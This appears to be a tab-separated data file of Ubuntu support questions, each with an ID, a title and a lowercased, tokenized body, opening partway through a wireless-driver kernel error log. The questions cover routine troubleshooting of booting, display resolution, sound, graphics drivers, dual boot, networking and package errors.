: fh_tssr_tx_status_reg : 0x05ff0000 [ 23.937833 ] iwlwifi 0000:01:00.0 : fh_tssr_tx_error_reg : 0x00000000 [ 23.937882 ] iwlwifi 0000:01:00.0 : log capacity 118980931 is bogus , limit to 256 entries [ 23.937885 ] iwlwifi 0000:01:00.0 : log write index -479274738 is bogus , limit to 256 [ 23.937888 ] iwlwifi 0000:01:00.0 : start iwl event log dump : display last 20 entries [ 23.937906 ] iwlwifi 0000:01:00.0 : evt_logt:0570291876:0xcf42790d:3081624423 [ 23.937917 ] iwlwifi 0000:01:00.0 : evt_logt:2080102228:0x510cdfeb:3867114880 [ 23.937928 ] iwlwifi 0000:01:00.0 : evt_logt:1204167583:0xd3a9b49f:3757509231 [ 23.937939 ] iwlwifi 0000:01:00.0 : evt_logt:3598207773:0xad5cf0ae:601834879 [ 23.937951 ] iwlwifi 0000:01:00.0 : evt_logt:3616630249:0xe7e9be8d:1596430253 [ 23.937962 ] iwlwifi 0000:01:00.0 : evt_logt:4175233537:0xd5da39b3:970899957 [ 23.937974 ] iwlwifi 0000:01:00.0 : evt_logt:2712366750:0x153f51e7:2721607275 [ 23.937985 ] iwlwifi 0000:01:00.0 : evt_logt:0718138711:0x3cdffdbf:1641189246 [ 23.937995 ] iwlwifi 0000:01:00.0 : evt_logt:3712401141:0xbf759b0c:602864538 [ 23.938007 ] iwlwifi 0000:01:00.0 : evt_logt:3884957690:0x1fdcff2f:3120168423 [ 23.938018 ] iwlwifi 0000:01:00.0 : evt_logt:3667864789:0x9c29b57d:2389098332 [ 23.938029 ] iwlwifi 0000:01:00.0 : evt_logt:3692789065:0xb7fb175f:2138878854 [ 23.938040 ] iwlwifi 0000:01:00.0 : evt_logt:4233080783:0xdba22fae:3672233812 [ 23.938051 ] iwlwifi 0000:01:00.0 : evt_logt:0431416889:0x8bf6f7f5:1811855613 [ 23.938062 ] iwlwifi 0000:01:00.0 : evt_logt:1801449446:0x2a7798ad:4025966542 [ 23.938074 ] iwlwifi 0000:01:00.0 : evt_logt:1850948857:0x7b21c75f:2990459829 [ 23.938084 ] iwlwifi 0000:01:00.0 : evt_logt:3841960874:0xf4dcb9bc:182299815 [ 23.938095 ] iwlwifi 0000:01:00.0 : evt_logt:4290679089:0xef2d9b57:3602627871 [ 23.938105 ] iwlwifi 0000:01:00.0 : evt_logt:3388896124:0x267f4374:3117114591 [ 23.938116 ] iwlwifi 0000:01:00.0 : evt_logt:1093868139:0x2ed05ba1:4279663190 [ 28.900054 ] iwlwifi 0000:01:00.0 : could not load the inst ucode section [ 28.900299 ] iwlwifi 0000:01:00.0 : failed to run init ucode : -110 [ 28.900341 ] iwlwifi 0000:01:00.0 : unable to initialize device . [ 28.901740 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s [ 28.904736 ] iwlwifi 0000:01:00.0 : radio type=0x1-0x2-0x0 [ 28.941191 ] iwlwifi 0000:01:00.0 : hardware error detected . restarting . [ 28.941197 ] iwlwifi 0000:01:00.0 : loaded firmware version : 8.83.5.1 build 33692 [ 28.941268 ] iwlwifi 0000:01:00.0 : start iwl error log dump : [ 28.941270 ] iwlwifi 0000:01:00.0 : status : 0x00040220 , count : -1222849788 [ 28.941274 ] iwlwifi 0000:01:00.0 : 0x9d93948f | advanced_sysassert [ 28.941277 ] iwlwifi 0000:01:00.0 : 0x74bc6c25 | upc [ 28.941279 ] iwlwifi 0000:01:00.0 : 0xd4d8eaf7 | branchlink1 [ 28.941282 ] iwlwifi 0000:01:00.0 : 0x79f929a3 | branchlink2 [ 28.941284 ] iwlwifi 0000:01:00.0 : 0x25185faf | interruptlink1 [ 28.941286 ] iwlwifi 0000:01:00.0 : 0x7367ef6f | interruptlink2 [ 28.941289 ] iwlwifi 0000:01:00.0 : 0x7686c34c | data1 [ 28.941291 ] iwlwifi 0000:01:00.0 : 0x6f06c975 | data2 [ 28.941293 ] iwlwifi 0000:01:00.0 : 0xfbaf3acb | line [ 28.941296 ] iwlwifi 0000:01:00.0 : 0xf7c9dd06 | beacon time [ 28.941298 ] iwlwifi 0000:01:00.0 : 0x7d93d56f | tsf low [ 28.941301 ] iwlwifi 0000:01:00.0 : 0x4c3ed509 | tsf hi [ 28.941303 ] iwlwifi 0000:01:00.0 : 0xfd0daafe | time gp1 [ 28.941305 ] iwlwifi 0000:01:00.0 : 0x6eefe341 | time gp2 [ 28.941308 ] iwlwifi 0000:01:00.0 : 0x66ff4ff5 | time gp3 [ 28.941310 ] iwlwifi 0000:01:00.0 : 0x28e5c81e | ucode version [ 28.941312 ] iwlwifi 0000:01:00.0 : 0x97f79493 | hw version [ 28.941315 ] iwlwifi 0000:01:00.0 : 0x4fffdb4f | board version [ 28.941317 ] iwlwifi 0000:01:00.0 : 0x6530d9e0 | hcmd [ 28.941320 ] iwlwifi 0000:01:00.0 : csr values : [ 28.941322 ] iwlwifi 0000:01:00.0 : ( 2nd byte of csr_int_coalescing is csr_int_periodic_reg ) [ 28.941327 ] iwlwifi 0000:01:00.0 : csr_hw_if_config_reg : 0x00480303 [ 28.941333 ] iwlwifi 0000:01:00.0 : csr_int_coalescing : 0x00000040 [ 28.941338 ] iwlwifi 0000:01:00.0 : csr_int : 0x20000000 [ 28.941343 ] iwlwifi 0000:01:00.0 : csr_int_mask : 0x00000000 [ 28.941348 ] iwlwifi 0000:01:00.0 : csr_fh_int_status : 0x00000000 [ 28.941353 ] iwlwifi 0000:01:00.0 : csr_gpio_in : 0x00000000 [ 28.941358 ] iwlwifi 0000:01:00.0 : csr_reset : 0x00000009 [ 28.941363 ] iwlwifi 0000:01:00.0 : csr_gp_cntrl : 0x080003c5 [ 28.941368 ] iwlwifi 0000:01:00.0 : csr_hw_rev : 0x00000054 [ 28.941373 ] iwlwifi 0000:01:00.0 : csr_eeprom_reg : 0x00000000 [ 28.941378 ] iwlwifi 0000:01:00.0 : csr_eeprom_gp : 0x90000004 [ 28.941384 ] iwlwifi 0000:01:00.0 : csr_otp_gp_reg : 0x00060000 [ 28.941389 ] iwlwifi 0000:01:00.0 : csr_gio_reg : 0x00080044 [ 28.941394 ] iwlwifi 0000:01:00.0 : csr_gp_ucode_reg : 0x00000000 [ 28.941399 ] iwlwifi 0000:01:00.0 : csr_gp_driver_reg : 0x00000000 [ 28.941404 ] iwlwifi 0000:01:00.0 : csr_ucode_drv_gp1 : 0x00000000 [ 28.941409 ] iwlwifi 0000:01:00.0 : csr_ucode_drv_gp2 : 0x00000000 [ 28.941415 ] iwlwifi 0000:01:00.0 : csr_led_reg : 0x00000018 [ 28.941420 ] iwlwifi 0000:01:00.0 : csr_dram_int_tbl_reg : 0x00000000 [ 28.941425 ] iwlwifi 0000:01:00.0 : csr_gio_chicken_bits : 0x27800200 [ 28.941430 ] iwlwifi 0000:01:00.0 : csr_ana_pll_cfg : 0x00000000 [ 28.941435 ] iwlwifi 0000:01:00.0 : csr_hw_rev_wa_reg : 0x0001001a [ 28.941440 ] iwlwifi 0000:01:00.0 : csr_dbg_hpet_mem_reg : 0xffff0000 [ 28.941443 ] iwlwifi 0000:01:00.0 : fh register values : [ 28.941456 ] iwlwifi 0000:01:00.0 : fh_rscsr_chnl0_stts_wptr_reg : 0x06607400 [ 28.941469 ] iwlwifi 0000:01:00.0 : fh_rscsr_chnl0_rbdcb_base_reg : 0x006626b0 [ 28.941482 ] iwlwifi 0000:01:00.0 : fh_rscsr_chnl0_wptr : 0x000000f8 [ 28.941495 ] iwlwifi 0000:01:00.0 : fh_mem_rcsr_chnl0_config_reg : 0x80819104 [ 28.941508 ] iwlwifi 0000:01:00.0 : fh_mem_rssr_shared_ctrl_reg : 0x0000003c [ 28.941521 ] iwlwifi 0000:01:00.0 : fh_mem_rssr_rx_status_reg : 0x07030000 [ 28.941534 ] iwlwifi 0000:01:00.0 : fh_mem_rssr_rx_enable_err_irq2drv : 0x00000000 [ 28.941546 ] iwlwifi 0000:01:00.0 : fh_tssr_tx_status_reg : 0x05ff0000 [ 28.941559 ] iwlwifi 0000:01:00.0 : fh_tssr_tx_error_reg : 0x00000000 [ 28.941609 ] iwlwifi 0000:01:00.0 : log capacity 118980931 is bogus , limit to 256 entries [ 28.941612 ] iwlwifi 0000:01:00.0 : log write index -479274738 is bogus , limit to 256 [ 28.941614 ] iwlwifi 0000:01:00.0 : start iwl event log dump : display last 20 entries [ 28.941632 ] iwlwifi 0000:01:00.0 : evt_logt:0570291876:0xcf42790d:3081624423 [ 28.941643 ] iwlwifi 0000:01:00.0 : evt_logt:2080102228:0x510cdfeb:3867114880 [ 28.941653 ] iwlwifi 0000:01:00.0 : evt_logt:1204167583:0xd3a9b49f:3757509231 [ 28.941664 ] iwlwifi 0000:01:00.0 : evt_logt:3598207773:0xad5cf0ae:601834879 [ 28.941674 ] iwlwifi 0000:01:00.0 : evt_logt:3616630249:0xe7e9be8d:1596430253 [ 28.941685 ] iwlwifi 0000:01:00.0 : evt_logt:4175233537:0xd5da39b3:970899957 [ 28.941695 ] iwlwifi 0000:01:00.0 : evt_logt:2712366750:0x153f51e7:2721607275 [ 28.941705 ] iwlwifi 0000:01:00.0 : evt_logt:0718138711:0x3cdffdbf:1641189246 [ 28.941716 ] iwlwifi 0000:01:00.0 : evt_logt:3712401141:0xbf759b0c:602864538 [ 28.941726 ] iwlwifi 0000:01:00.0 : evt_logt:3884957690:0x1fdcff2f:3120168423 [ 28.941736 ] iwlwifi 0000:01:00.0 : evt_logt:3667864789:0x9c29b57d:2389098332 [ 28.941747 ] iwlwifi 0000:01:00.0 : evt_logt:3692789065:0xb7fb175f:2138878854 [ 28.941757 ] iwlwifi 0000:01:00.0 : evt_logt:4233080783:0xdba22fae:3672233812 [ 28.941768 ] iwlwifi 0000:01:00.0 : evt_logt:0431416889:0x8bf6f7f5:1811855613 [ 28.941778 ] iwlwifi 0000:01:00.0 : evt_logt:1801449446:0x2a7798ad:4025966542 [ 28.941788 ] iwlwifi 0000:01:00.0 : evt_logt:1850948857:0x7b21c75f:2990459829 [ 28.941799 ] iwlwifi 0000:01:00.0 : evt_logt:3841960874:0xf4dcb9bc:182299815 [ 28.941809 ] iwlwifi 0000:01:00.0 : evt_logt:4290679089:0xef2d9b57:3602627871 [ 28.941820 ] iwlwifi 0000:01:00.0 : evt_logt:3388896124:0x267f4374:3117114591 [ 28.941830 ] iwlwifi 0000:01:00.0 : evt_logt:1093868139:0x2ed05ba1:4279663190 [ 33.904118 ] iwlwifi 0000:01:00.0 : could not load the inst ucode section [ 33.904470 ] iwlwifi 0000:01:00.0 : master disable timed out , 100 usec [ 33.904489 ] iwlwifi 0000:01:00.0 : failed to run init ucode : -110 [ 33.904528 ] iwlwifi 0000:01:00.0 : unable to initialize device . [ 33.911541 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s [ 33.914547 ] iwlwifi 0000:01:00.0 : radio type=0x1-0x2-0x0 [ 38.916152 ] iwlwifi 0000:01:00.0 : could not load the inst ucode section [ 38.916505 ] iwlwifi 0000:01:00.0 : master disable timed out , 100 usec [ 38.916529 ] iwlwifi 0000:01:00.0 : failed to run init ucode : -110 [ 38.916570 ] iwlwifi 0000:01:00.0 : unable to initialize device . [ 38.916874 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s [ 38.919824 ] iwlwifi 0000:01:00.0 : radio type=0x1-0x2-0x0 [ 43.920062 ] iwlwifi 0000:01:00.0 : could not load the inst ucode section [ 43.920417 ] iwlwifi 0000:01:00.0 : master disable timed out , 100 usec [ 43.920437 ] iwlwifi 0000:01:00.0 : failed to run init ucode : -110 [ 43.920476 ] iwlwifi 0000:01:00.0 : unable to initialize device . [ 44.092216 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s [ 44.095158 ] iwlwifi 0000:01:00.0 : radio type=0x1-0x2-0x0 [ 49.092115 ] iwlwifi 0000:01:00.0 : could not load the inst ucode section [ 49.092468 ] iwlwifi 0000:01:00.0 : master disable timed out , 100 usec [ 49.092487 ] iwlwifi 0000:01:00.0 : failed to run init ucode : -110 [ 49.092529 ] iwlwifi 0000:01:00.0 : unable to initialize device . [ 49.107129 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s [ 49.110113 ] iwlwifi 0000:01:00.0 : radio type=0x1-0x2-0x0 [ 54.108112 ] iwlwifi 0000:01:00.0 : could not load the inst ucode section [ 54.108465 ] iwlwifi 0000:01:00.0 : master disable timed out , 100 usec [ 54.108485 ] iwlwifi 0000:01:00.0 : failed to run init ucode : -110 [ 54.108524 ] iwlwifi 0000:01:00.0 : unable to initialize device . [ 96.874102 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s [ 96.877101 ] iwlwifi 0000:01:00.0 : radio type=0x1-0x2-0x0 [ 101.876061 ] iwlwifi 0000:01:00.0 : could not load the inst ucode section [ 101.876411 ] iwlwifi 0000:01:00.0 : master disable timed out , 100 usec [ 101.876431 ] iwlwifi 0000:01:00.0 : failed to run init ucode : -110 [ 101.876468 ] iwlwifi 0000:01:00.0 : unable to initialize device . [ 102.986344 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s [ 102.989317 ] iwlwifi 0000:01:00.0 : radio type=0x1-0x2-0x0 [ 107.988209 ] iwlwifi 0000:01:00.0 : could not load the inst ucode section [ 107.988591 ] iwlwifi 0000:01:00.0 : master disable timed out , 100 usec [ 107.988618 ] iwlwifi 0000:01:00.0 : failed to run init ucode : -110 [ 107.988672 ] iwlwifi 0000:01:00.0 : unable to initialize device . carbon @ carbon-pro : ~ $
193121	ca n't boot from cd now that ubuntu is installed ?	i ran across an older toshiba laptop with a pentium 4 2.66 ghz cpu and 464 mg of ram . i thought i would try out ubuntu 12.04 on it instead of running live on another computer to test it . so anyway i love the gui but this computer just is n't fast enough to handle it for my taste at least . so i thought i would try the newer lubuntu distro since it 's a little lighter weight and i ca n't get the computer to boot from the install disk i burned . i followed all the instructions , i burned the image to the disk correctly even tried burning another copy to see if it was that . but it just goes straight to the menu where you select what version of ubuntu you want to boot . i can get to a grub prompt from there but i do n't know the command if there is one i can use to tell it to boot from disk ? i tried going into bios to make sure disk drive it still first priority and the computer just freezes and sits there forever doing nothing . i also thought that it might have been a bad download so i tried a version of fedora on it that i know works and it still wo n't boot from cd . what should i do now ?
193128	how to set and limit my resolution to 640x480	how can i set and limit the resolution in ubuntu 12 to 640x480 there 's not much in the xorg.conf file anymore , so i 'm guessing this is no longer the place to do it ? i ca n't do it using the gui either because it does n't show me the 640x480 option . while setting the resolution the computer is connected to a normal screen but later it will be connected to a screen that only supports 640x480 and does n't report its supported modes to the computer . the only thing in my xorg.conf ( by default ) is this : section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection update , in response to kamil 's answer : i do not have the gdm folder , but i get the idea however if i execute those commands i get the following xrandr -- newmode `` 640x480_60.00 '' 23.75 640 664 720 800 480 483 487 500 -hsync +vsync xrandr : failed to get size of gamma for output default x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 153 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 19 current serial number in output stream : 19 root @ timothy-desktop : ~ # xrandr -- addmode default 640x480_60.00 xrandr : failed to get size of gamma for output default root @ timothy-desktop : ~ # xrandr -- output default -- mode 640x480 xrandr : failed to get size of gamma for output default note that vga1 is default in my case .
193130	what is the most basic window manager for ubuntu that can be used to display a single application	i 've tried starting a full screen application without a window manager , using xinit , which works but instead of starting at the top left of the screen the application starts somewhere in the middle of my screen . i 've tried the same using a custom entry in /usr/share/xsessions and starting that from lightdm instead of the default ubuntu window manager , but that gives me the same result . i 've then added my application to the startup applications of the ubuntu window manager and that works properly ... but i do n't want to start the entire desktop so i 'm thinking perhaps a simple window manager will allow me to define that my application should start as soon as it is loaded and that as a result it will be displayed full screen and starting at the upper left corner of the screen . so basically a window manager that will allow me to disable everything except my application . ( and the background should be completely black by default so that the screen is black until my application has finished loading
193131	how to debug lack of sound in asus eee pc	i have an asus eee pc 1225b with fresh lubuntu 12.04 . and no sound . it does n't seem to be some common problem , so i have to make some research what 's up . i tried running alsamixer , so i know i have realtek alc269vb with nothing muted unexpectedly . what can i do next to identify and solve the problem ? additional info : alsamixer shows two cards : hd-audio generic and hda ati-sb ( realtek alc269vb ) ; the first one is muted . ~ $ aplay alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave aplay : main:682 : bĺä d otwierania audio : nie ma takiego pliku ani katalogu the polish part can be translated as `` error opening audio : there is no such file or directory '' . ~ $ sudo lspci -v | grep -a7 -i `` audio '' 00:01.1 audio device : advanced micro devices [ amd ] nee ati wrestler hdmi audio [ radeon hd 6250/6310 ] subsystem : asustek computer inc. device 103b flags : bus master , fast devsel , latency 0 , irq 44 memory at feb44000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 3 capabilities : [ 58 ] express root complex integrated endpoint , msi 00 capabilities : [ a0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 100 ] vendor specific information : id=0001 rev=1 len=010 < ? > -- 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) ( rev 40 ) subsystem : asustek computer inc. device 103b flags : bus master , slow devsel , latency 32 , irq 16 memory at feb40000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel
193135	how to check if netconsole really works ?	i installed netconsole using the instrunctions given here : https : //wiki.ubuntu.com/kernel/netconsole dmesg | grep netconsole says everything is ok , but i wo n't believe it so easily : ) how can i make ubuntu generate some kernel message in order to see if netconsole really works and sends everything to the other computer ? i tried : logger -p kern.alert `` test message '' # this apparently talks to syslog only echo `` test message '' > /dev/kmsg and wrote a small program that just did a segfault . all this generated entries in /var/log/kern.log , but not in dmesg and it was not copied via netconsole to the other computer . so what can i do to see if netconsole actually works ? ( my ubuntu version is 12.04 )
193140	can not install `` ati/amd proprietary fglrx graphics driver '' ( systemerror )	i have just installed a fresh copy of 12.04.1 64bit . i formatted my pc completely and enabled updates during the installation . after the installation was complete , i went on updating my software . however , when i wanted to install the additional drivers using the additional drivers tool ( namely `` ati/amd proprietary fglrx graphics driver '' ) , it gave me this error : systemerror : e : unable to correct problems , you have held broken packages . the same error shows up if i try installing the post-release updates driver . installing the drivers from the terminal results in this output : xxxxxx : ~ $ sudo apt-get install fglrx [ sudo ] password for xxxxx : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : fglrx : depends : lib32gcc1 but it is not going to be installed depends : libc6-i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . '' i get this using `` sudo apt-get update '' : http : //pastebin.com/awatdxjy but `` sudo apt-get install fglrx '' still get me this error : http : //pastebin.com/rym55bvn & '' sudo apt-get -f install fglrx '' gives me this error : http : //pastebin.com/xxekajvp any help would be greatly appreciated . ( please note that i 'm new to linux , coming directly from windows . i have tried ubuntu twice or so before , but it was not for a long period of time . the drivers got installed smoothly the few times i 've tried ubuntu , but post-release updates never worked for me . ) [ i am going to work now , so i can only answer from my phone . ca n't really test any new solutions you may give me until ~10 hours from now on . maybe more . ] @ stonedsquirrel when i try to run that command , i get this error : '' xxxxxx : ~ $ sudo apt-get install fglrx [ sudo ] password for xxxxx : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : fglrx : depends : lib32gcc1 but it is not going to be installed depends : libc6-i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . '' ie . i get the same error .
193144	dual boot uefi windows 7 and ubuntu 12.04 ( both 64 bits ) . w7 entry does n't appear in grub	after trying to install both os during 2 days , i 'm confused and getting mad ... i have ssd 128 gb and hdd 500 gb both empty . my laptop is asus k55vm . bios support uefi . what i have done : install new ssd ( samsung 830 128gb ) use gparted on livecd to create new table of partitions ( gpt ) and create 3 partitions ( in the ssd ) for different purposes : partition 1 : 80 gb ( w7 ) ; partition 2 : 30 gb ( ubuntu 12.04 -just / - ) ; partition 3 : 10 gb unused ( for future extesion of the other partitions ) install windows 7 ( with uefi ) in partition 1 . this create : /dev/sda1 - > 100 mb for system ( uefi boot i guess ) - fat32 /dev/sda2 - > 100 mb aprox . for msr /dev/sda3 - > 79.800 mb aprox . for windows7 data in this point everything works fine . i have w7 . now i install ubuntu 12.04 amd64 ( with uefi ) as follows : install / in partition 2 - > /dev/sda4 30 gb ext4 , and in the hdd i install /home and swap . i select bootloader in /dev/sda1 ( where it 's supposed to be the uefi boot ) . i install updates and reboot . problem : now just appears grub menu with ubuntu entries and not windows 7 . alternative solution found : when i turn on laptop , before loading grub i press esc key and appear bios boot , so i can select to boot the windows partition , ubuntu partition , dvd , usb , etc ... but i think is not the best way to boot different os . i 've tried : sudo update-grub2 with no success . what can i do ? ?
193145	i have just one working wifi connection	after configuring my computer for pxe installation ( as a server ) . i have only one working internet connection via my home wifi . the configuration was followed by pxe install server community help . actually i can connect my computer to other routers too but i have no internet connection . how is it possible ? any ideas how can i remove the pxe stuff and recover the `` factory settings '' for the network ?
193146	can not install automake and libboost-all-dev because i ca n't fetch repository updates	i downloaded ubuntu 12.04 and installed it in a vmware workstation . and i 've been using all the installation commands : sudo apt-get install automake sudo apt-get install libboost-all-dev and some others , but it kept on saying : e : unable to locate package automake e : unable to locate package libboost-all-dev i also wrote the command : sudo apt-get update and the reply was some error messages : unable to connect ... w : failed to fetch ... w : some index failed to download any ideas ?
193149	using duplicity directly , is it possible to have multiple backup plans ?	if i understand correctly , duplicity is the command line tool for creating backups and can be used stand-alone ( i.e . no dejadup involved ) for creating backups . is it possible to set up multiple backup plans with different schedules and sources/targets ? in particular i would like to : regularly back up my complete home folder as i do now with deja-dup , i.e . whenever i connect my external drive and the backup is due . back up different sets of folders to a remote server ( strato hidrive , so ftp , smb or rsync ) on a manual basis ( ideally just a `` trigger '' command i issue ) since i need to be in a place with fast internet connection to do this ( i am speaking about ~200 gb here ) i think this would just need some time setting up the different commands for the remote backup . the local backup could stay in dejadup . but will duplicity be able to handle this ? or will it get confused with the different backups ? also : what will the performance for the remote backups be like ? how will the actual diff+copy mechanism work in the remote case ? why i ask this is just that with dejadup i only get one backup plan , back in time only supports local copies ( so i would have to mount the ftp locally and diff there which seems a waste of bandwidth ) and rsnapshot uses hardlinks and is thus required to run on the target ) . but duplicity seems to be able to do what i want ...
193156	how to run shell script from html ?	i 'm somewhat new to ubuntu linux . i need to run the shell script from a html code . as i read somewhere like using apache2 to generate a html and somehow i 've succeeded to run a sh file from html , but i 'm unable to see the command prompt which executes the commands in the sh script . it 's running may be as a daemon . so can any body help me how to make it visible ?
193157	gui tool to deny standard users from using cd-rom and usbs ?	as a part of security policy we need to disable cd-rom and usb access for normal users . only root users should have the access . i could do it by removing the user from the 'cdrom ' and 'plugdev ' groups in /etc/group . but this needs lot of work if there is many users i need a gui tool !
193163	w : some index failed to download	i downloaded ubuntu 12.04 and installed it in a vmware workstation . and i 've been using all the installation commands : sudo apt-get install automake sudo apt-get install libboost-all-dev and some others , but it kept on saying : e : unable to locate package automake e : unable to locate package libboost-all-dev i also wrote the command : sudo apt-get update and the reply was some error messages : unable to connect ... w : failed to fetch ... w : some index failed to download and the internet is working properly . any ideas ?
193164	taskbar and alt+tab do not show gtkwave application ?	i have some .vcd files with wave dumps , i use gtkwave application to view those files . i used to use kubuntu , but recently switched to ubuntu ( updated today to 12.10 ) . when the gtkwave opens , it is not added to the left-side unity panel . when it gets minimized , i can not get it back again . i test the process existence by top , gtkwave is there and running . is it a problem with unity or gtkwave ? can i fix ? update : when i show desktop , then restore all windows , then minimize showing windows one-by-one i find the gtkwave at the back ; ) it is still very annoying . thanks in advance , tarek
193169	root filesystem not mounted	the problem occurred after i powered off my 10-year-old ubuntu 10.04 compaq pc while booting . now all i get is the initramfs prompt and an error on mounting the root file system . below is the output of `` mount '' , run from the ubuntu live cd . interestingly , `` mount -l '' hangs and produces some strange lines in `` dmsg '' , i 'll post them tonight , when i 'm in front of the pc . `` fsck '' returns that the partition is exclusively used by another process , `` lsof | grep sda3 '' show four unkillable processes . aufs on / type aufs ( rw ) none on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) none on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ubuntu )
193171	alternative for xshell .	do anyone knows an alternative for xshell ? i have checked and the alternatives mentioned are putty , openssh etc . but i require it mainly for port forwarding and for that xshell works perfectly . is there any way ( apart from using wine ) to install xshell in ubuntu precise ?
193172	what partitions do i need to replace to uninstall ubuntu and re-install osx ?	i have a emac ( imac ) powerpc g4 1gz/1gb ram , ati radeon 9400 - 80gb / dvd rw+- i have installed ubuntu and it is running just fine . however , the lack of flash functionality on the ppc architecture is a problem as need it for web development etc . so , i want to roll back to osx . but , ubuntu has removed some hdd partitions that apparently osx cd/dvd 's require to re-install . can anyone let me know what partitions are required , their type ( ext4 , hfa , fat etc ) and sizes ? have trawled the web and just seem to be going in circles .
193188	infiniband for ubuntu 12.04 ? recommendations ? comments ?	we are new to infiniband and are considering infiniband technology to use in our data center . we have been reading on the net about infiniband and are surprised to read about the nightmares of getting infiniband running on linux systems . is this true ? should we consider infiniband or not ? if so , what brand/card/model is recommended for ubuntu 12.04 lts ? recommendations ? considerations ?
193191	problem with mergelist in update-manager	my update-manager seems to malfunction . when i open it , it gives me an error message saying ( in dutch ) that a unsolvable error has occurred followed by this : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_packages
193194	what is the best video editor on ubuntu for editing multi-format/multi-eco ?	i have many video clips with different formats and i want to create a short movies by joining them . most of the clips are taken with nokia n8 and lumia 800 . i am using ubuntu , i have tried many of editors but i can not edit/video clips due to different video formats . which open source editor should i use to achieve following tasks : join different vidoe formats/encoding to produce on single movie export to different formats ( .avi , youtube , etc ) add texts on the clips and insert images i do n't want to install and try many of them .
193198	no edit button in the software center	go to ubuntu software center . edit > software sources change the server from the default value to some other value . i could n't find the edit button under the ubuntu software center .
193201	resolv.conf still the same on new network	when i switch between different networks with different dhcp servers , my resolv.conf file does n't change ( other settings like ip and gw change ) . workaround is to remove resolv.conf and run dhclient manually . my interfaces file looks like this : cat /etc/network/interfaces auto lo iface lo inet loopback how to fix it permanent ?
193202	having trouble instaling ubuntu using a usb boot on pc	i want to instal ubuntu on my pc using a usb . i changed the bios option so now the boot is from the usb , but when i restart the computer it shows a black page with only this sighn `` _ '' flashing in the top left corner , and nothing hapens when i press any key . what should i do to make it work ?
193205	libapt-inst1.4 : i386 fais to install	today i was notifed of updates , some of them being libapt . so i press `` install updates '' , and i got this error : the following packages have unmet dependencies : libapt-inst1.4 : i386 : depends : libapt-pkg4.12 ( > = 0.8.16~exp12ubuntu10.2 ) but 0.8.16~exp12ubuntu10.3 is installed depends : libc6 ( > = 2.4 ) but 2.15-0ubuntu10 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libstdc++6 ( > = 4.4.0 ) but 4.6.3-1ubuntu5 is installed so i open the terminal and typed sudo apt-get install -f i was shown this : the following extra packages will be installed : libapt-inst1.4 libapt-inst1.4 : i386 libapt-pkg4.12 : i386 the following new packages will be installed : libapt-pkg4.12 : i386 the following packages will be upgraded : libapt-inst1.4 libapt-inst1.4 : i386 2 upgraded , 1 newly installed , 0 to remove and 18 not upgraded . 1 not fully installed or removed . need to get 0 b/1,146 kb of archives . after this operation , 3,031 kb of additional disk space will be used . do you want to continue [ y/n ] ? i selected `` yes '' . and then : e : internal error , no file name for libapt-pkg4.12 also , when i open the software center , i get a message that the database is broken ... i 'm using 12.04 64bit but why it wants to install the i386 version ? i 'm using 64 bit ubuntu ...
193213	video plays back too quickly , sound problem - ubuntu 12.04 lts	firstly i have problem with my sound on my computer . when i listen to music sometimes sound lagging for two or three seconds and for the rest of song it plays ok. secondly i ca n't watch youtube or vimeo videos because it plays very fast . for example 3 minutes video can be played at 20 secounds . i tried to use other chrome version or firefox - that do n't fix my problem . my ubuntu version : 12.04 lts music player : audacious web browser : google chrome or firefox . mb : asrock p67 pro3 speakers : genius sw-hf 5.1 6000 drivers : installed with ubuntu , graphics driver from additional drivers ( in system ) . graphics card : geforce gt220 psu : chieftec gpa-500s cpu : intel core i5 2500k hdd : ocz agility 3 sound card : realtek alc892 i 'm so sorry for my english ( i am from poland ) . thank you in advance . konrad
